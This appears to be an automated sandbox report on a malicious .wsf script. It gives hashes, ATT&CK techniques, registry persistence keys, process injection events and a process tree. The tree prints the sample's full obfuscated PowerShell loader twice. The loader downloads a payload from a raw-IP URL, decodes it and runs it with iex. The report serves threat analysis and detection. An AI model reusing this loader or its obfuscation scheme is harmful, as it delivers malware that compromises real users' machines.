cd20ff18791a007f0cf3d36fb4dccdf9cdbb8132f9b9be5d099c487dfa0fdbf5

General

Target

655de8d3db5fbb1b2c4a57bb403f01070bf044c9afe2c4d6f7f25c2c765d87f7.wsf
Size

109KB
MD5

7700a37bbfb2243c94b721449cc69b7f
SHA1

bc4e02172bfd1b919672b7480a8ddc5ad439ce9a
SHA256

655de8d3db5fbb1b2c4a57bb403f01070bf044c9afe2c4d6f7f25c2c765d87f7
SHA512

014ec05586005b0a10648830a32ee8616c8ed83ae0469a89da4bd3f3ee5f280a8a91f59ed99338015c1e95c10b6ea9ff11616b53f809ce8e6232edf52a854506
SSDEEP

3072:KI9rv8awfhzzoNWI1Qe3OjVK3EyQaeCamHaXQyKpgRpYCw+YtavFUJRoW6S:KWrvWhzzUn1Qe3OjVK3EyQvCamHaXQyM

Score

8^/10

persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-3452737119-3959686427-228443150-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	recover.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2656	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\STEX4JPHM = "C:\\Program Files (x86)\\windows mail\\wab.exe"	recover.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2380	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2472	powershell.exe
2380	wab.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2472 set thread context of 2380	2472	powershell.exe	34
PID 2380 set thread context of 1192	2380	wab.exe	21
PID 2380 set thread context of 272	2380	wab.exe	39
PID 272 set thread context of 1192	272	recover.exe	21

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	recover.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
2656	powershell.exe
2472	powershell.exe
2472	powershell.exe
2380	wab.exe
2380	wab.exe
2380	wab.exe
2380	wab.exe
2380	wab.exe
2380	wab.exe
2380	wab.exe
2380	wab.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe
272	recover.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
2472	powershell.exe
2380	wab.exe
1192	Explorer.EXE
1192	Explorer.EXE
272	recover.exe
272	recover.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2160 wrote to memory of 2656	2160	WScript.exe	29
PID 2160 wrote to memory of 2656	2160	WScript.exe	29
PID 2160 wrote to memory of 2656	2160	WScript.exe	29
PID 2656 wrote to memory of 2860	2656	powershell.exe	31
PID 2656 wrote to memory of 2860	2656	powershell.exe	31
PID 2656 wrote to memory of 2860	2656	powershell.exe	31
PID 2656 wrote to memory of 2472	2656	powershell.exe	32
PID 2656 wrote to memory of 2472	2656	powershell.exe	32
PID 2656 wrote to memory of 2472	2656	powershell.exe	32
PID 2656 wrote to memory of 2472	2656	powershell.exe	32
PID 2472 wrote to memory of 2836	2472	powershell.exe	33
PID 2472 wrote to memory of 2836	2472	powershell.exe	33
PID 2472 wrote to memory of 2836	2472	powershell.exe	33
PID 2472 wrote to memory of 2836	2472	powershell.exe	33
PID 2472 wrote to memory of 2380	2472	powershell.exe	34
PID 2472 wrote to memory of 2380	2472	powershell.exe	34
PID 2472 wrote to memory of 2380	2472	powershell.exe	34
PID 2472 wrote to memory of 2380	2472	powershell.exe	34
PID 2472 wrote to memory of 2380	2472	powershell.exe	34
PID 2472 wrote to memory of 2380	2472	powershell.exe	34
PID 1192 wrote to memory of 272	1192	Explorer.EXE	39
PID 1192 wrote to memory of 272	1192	Explorer.EXE	39
PID 1192 wrote to memory of 272	1192	Explorer.EXE	39
PID 1192 wrote to memory of 272	1192	Explorer.EXE	39

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\655de8d3db5fbb1b2c4a57bb403f01070bf044c9afe2c4d6f7f25c2c765d87f7.wsf"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
      4⤵
      PID:2860
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2472
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
        5⤵
        
        PID:2836
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2380
- C:\Windows\SysWOW64\recover.exe
  "C:\Windows\SysWOW64\recover.exe"
  2⤵
  - Adds policy Run key to start application
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

2

T1547

Registry Run Keys / Startup Folder

2

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

2

T1547

Registry Run Keys / Startup Folder

2

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5X1QO5W0O9E7F5UW0PP1.temp

Filesize
7KB

MD5
30d2ad3db77a0f13cf6021f49389a9cc

SHA1
58c09e1657bd0e9ee16ff19e726a4a55692465e2

SHA256
cd4c1d9c6f4c76f416868c22e079c1e1ff852117ffd6ce1af3164bb3c1d07509

SHA512
384121e8cd99b0e12796306f3e73f7772c75d65f10fb7c2b90ab8f049920b04ac3daa6f59c2e80ce6b569b4ceecb485e8b3437fddc71d6f81ef3b74e9d76809c

Download Submit
C:\Users\Admin\AppData\Roaming\Thermoswitch172.Med

Filesize
433KB

MD5
2f96fb58ecb915bd235a979620403dc7

SHA1
cdbaa93b0ba0a297b77159b6d25d919dfc6ec3b5

SHA256
9f96bf67fcddaf6dafbf923e2dd5160e03cbffc872e2ee2229b26dabe15ae4b0

SHA512
4c0e84abe4a3dcab40229509a5e6f48a2609217966e397b2f843e68ba207c00b5d07a31edb0d80e6f30760a298efb60de00c81cd493255257ab801056eafd9ec

Download Submit
memory/272-32-0x0000000000090000-0x00000000000CF000-memory.dmp

Filesize
252KB

Download
memory/272-30-0x0000000000090000-0x00000000000CF000-memory.dmp

Filesize
252KB

Download
memory/1192-28-0x0000000000220000-0x0000000000320000-memory.dmp

Filesize
1024KB

Download
memory/2380-31-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2380-29-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2380-25-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2380-23-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2472-17-0x0000000006390000-0x00000000074EF000-memory.dmp

Filesize
17.4MB

Download
memory/2656-7-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2656-24-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-19-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2656-20-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2656-21-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2656-22-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2656-11-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-18-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-4-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2656-8-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2656-9-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2656-10-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2656-6-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-5-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads